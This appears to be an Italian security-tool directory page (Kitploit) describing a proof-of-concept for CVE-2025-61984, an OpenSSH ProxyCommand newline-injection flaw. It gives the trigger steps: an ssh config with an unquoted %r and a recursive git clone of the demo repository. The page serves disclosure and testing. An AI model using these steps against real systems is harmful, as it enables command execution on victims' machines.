Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dgl/cve-2025-61984-poc
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingRed Teaming
GitHubdgl/cve-2025-61984-poc

cve-2025-61984-poc

Proof-of-concept che dimostra una vulnerabilità di iniezione di newline in OpenSSH ProxyCommand (CVE-2025-61984), consentendo l'iniezione di comandi tramite una configurazione SSH appositamente predisposta.

Vedi RepositorySito web
71380 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-61984 PoC

Questa è una proof of concept che utilizza un carattere di nuova riga per confondere il ProxyCommand di OpenSSH <10.1. Articolo completo.

Come eseguire

Configura un .ssh/config contenente:

Host *.example.com
  ProxyCommand some-command %r@%h:%p

(Il comando non ha importanza, deve solo contenere un %r non quotato negli argomenti da qualche parte.)

Poi esegui (per bash):

$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc

Oppure se usi fish come $SHELL:

git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc

Se non stai usando la shell ma vuoi comunque testare questo, puoi fare:

$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Scarica lo strumento